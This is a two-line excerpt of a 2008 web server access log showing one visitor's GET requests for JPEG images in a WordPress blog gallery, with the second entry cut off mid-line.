24.121.44.88 - - [11/Jun/2008:13:24:07 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0140.jpg HTTP/1.1" 200 351155 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:24:08 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0129.jpg HTTP/1.1" 200 467243 "-" "Mozilla/5.0 (Windows; U; Wi